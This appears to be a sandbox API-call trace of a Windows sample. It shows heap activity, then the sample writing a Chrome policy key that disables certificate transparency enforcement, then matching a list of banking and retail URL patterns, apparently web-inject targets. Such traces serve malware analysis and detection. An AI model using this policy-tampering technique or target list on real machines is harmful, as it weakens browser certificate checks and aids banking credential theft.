	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2869b0
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a160
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x27a358
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x286938
	[0191.427] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x2868c0
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869d8 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869d8 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x303b20 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a358 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869b0 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869b0 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a358 | out: hHeap=0x260000) returned 1
	[0191.427] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286a00 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869d8 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ff8 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869d8 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x303b88 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2868c0 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a358 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286a00 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x303b20 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869b0 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29ec08 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x29fcc0 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302250 | out: hHeap=0x260000) returned 1
	[0191.428] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27a160 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304aa8 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286938 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304ae0 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304aa8 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x274918 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x302ff8 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x303bf0 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2869d8 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x286870 | out: hHeap=0x260000) returned 1
	[0191.429] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x303b88 | out: hHeap=0x260000) returned 1
	[0191.445] GetProcessHeap () returned 0x260000
	[0191.445] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5e) returned 0x118cdd8
	[0191.445] lstrlenA (lpString="Software") returned 8
	[0191.445] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.445] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x260) returned 0x0
	[0191.446] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.446] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x264) returned 0x0
	[0191.446] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.446] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x268) returned 0x0
	[0191.446] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.446] RegCloseKey (hKey=0x268) returned 0x0
	[0191.446] lstrlenA (lpString="Software\\Policies") returned 17
	[0191.446] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.446] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x25c) returned 0x0
	[0191.447] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.447] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x26c) returned 0x0
	[0191.447] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.447] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x270) returned 0x0
	[0191.447] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.447] RegCloseKey (hKey=0x270) returned 0x0
	[0191.447] lstrlenA (lpString="Software\\Policies\\Google") returned 24
	[0191.447] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.447] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.447] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.448] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.448] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.448] RegCloseKey (hKey=0x0) returned 0x6
	[0191.448] lstrlenA (lpString="Software\\Policies\\Google") returned 24
	[0191.448] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.448] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.448] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.448] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.448] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.448] RegCloseKey (hKey=0x0) returned 0x6
	[0191.448] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20106, lpSecurityAttributes=0x0, phkResult=0x1df750, lpdwDisposition=0x0 | out: phkResult=0x1df750*=0x268, lpdwDisposition=0x0) returned 0x0
	[0191.451] RegCloseKey (hKey=0x268) returned 0x0
	[0191.451] lstrlenA (lpString="Software\\Policies\\Google\\Chrome") returned 31
	[0191.451] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.451] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.452] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.452] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.452] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.452] RegCloseKey (hKey=0x0) returned 0x6
	[0191.452] lstrlenA (lpString="Software\\Policies\\Google\\Chrome") returned 31
	[0191.452] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.452] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.452] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.452] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.452] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.452] RegCloseKey (hKey=0x0) returned 0x6
	[0191.452] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20106, lpSecurityAttributes=0x0, phkResult=0x1df750, lpdwDisposition=0x0 | out: phkResult=0x1df750*=0x270, lpdwDisposition=0x0) returned 0x0
	[0191.453] RegCloseKey (hKey=0x270) returned 0x0
	[0191.453] lstrlenA (lpString="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls") returned 81
	[0191.453] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.454] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.454] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.454] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df754 | out: phkResult=0x1df754*=0x0) returned 0x2
	[0191.454] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.454] RegCloseKey (hKey=0x0) returned 0x6
	[0191.454] lstrlenA (lpString="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls") returned 81
	[0191.454] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.454] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.455] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.455] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20119, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x0) returned 0x2
	[0191.455] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.455] RegCloseKey (hKey=0x0) returned 0x6
	[0191.455] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20106, lpSecurityAttributes=0x0, phkResult=0x1df750, lpdwDisposition=0x0 | out: phkResult=0x1df750*=0x268, lpdwDisposition=0x0) returned 0x0
	[0191.456] RegCloseKey (hKey=0x268) returned 0x0
	[0191.456] GetProcessHeap () returned 0x260000
	[0191.456] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118cdd8 | out: hHeap=0x260000) returned 1
	[0191.456] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.456] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20119, phkResult=0x10090708 | out: phkResult=0x10090708*=0x270) returned 0x0
	[0191.456] RegQueryInfoKeyA (in: hKey=0x270, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1df82c, lpcbMaxValueNameLen=0x1df828, lpcbMaxValueLen=0x1df824, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1df82c*=0x0, lpcbMaxValueNameLen=0x1df828, lpcbMaxValueLen=0x1df824, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0191.456] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x774c0000
	[0191.456] RegCloseKey (hKey=0x270) returned 0x0
	[0191.456] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0191.456] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x268) returned 0x0
	[0191.457] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x274, lpdwDisposition=0x0) returned 0x0
	[0191.457] RegSetValueExA (in: hKey=0x274, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="secure.", cbData=0x7 | out: lpData="secure.") returned 0x0
	[0191.457] RegCloseKey (hKey=0x274) returned 0x0
	[0191.458] strstr (_Str="secure.", _SubStr="www.") returned 0x0
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.458] strstr (_Str="*favicon.ico=74536be4f9c2db6ca8c01a8054e1338a*", _SubStr="https://") returned 0x0
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.458] strstr (_Str="*corporatebankingweb/core/*", _SubStr="https://") returned 0x0
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.458] strstr (_Str="*favicon.ico=d73a726d92acc898bbbb175d3ab3337e*", _SubStr="https://") returned 0x0
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.458] strstr (_Str="*.ebanking-services.com/*.asp*", _SubStr="https://") returned 0x0
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.458] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.459] strstr (_Str="*.ebanking-services.com/*/*favicon.ico*", _SubStr="https://") returned 0x0
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.459] strstr (_Str="*favicon.ico=ce2bb103af1a10241de273caa885dbdd*", _SubStr="https://") returned 0x0
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.459] strstr (_Str="*secure.myvirtualbranch.com*", _SubStr="https://") returned 0x0
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.459] strstr (_Str="*favicon.ico=c8d027c1b29ac0def84ddfac56e682c8*", _SubStr="https://") returned 0x0
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.459] strstr (_Str="*/wcmfd/wcmpw/CustomerLogin*", _SubStr="https://") returned 0x0
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.459] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.459] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="*/wcmfd/wcmpw/favicon.ico*", _SubStr="https://") returned 0x0
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="*favicon.ico=9d0cf5e88c1fbcc637b90b76128d6bb9*", _SubStr="https://") returned 0x0
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="*/rcrd/1556022719770184*", _SubStr="https://") returned 0x0
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="http*://*.bestbuy.com*", _SubStr="https://") returned 0x0
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f268
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f268 | out: hHeap=0x260000) returned 1
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.460] strstr (_Str="*/rcrd/1527164097084304*", _SubStr="https://") returned 0x0
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.460] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.460] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
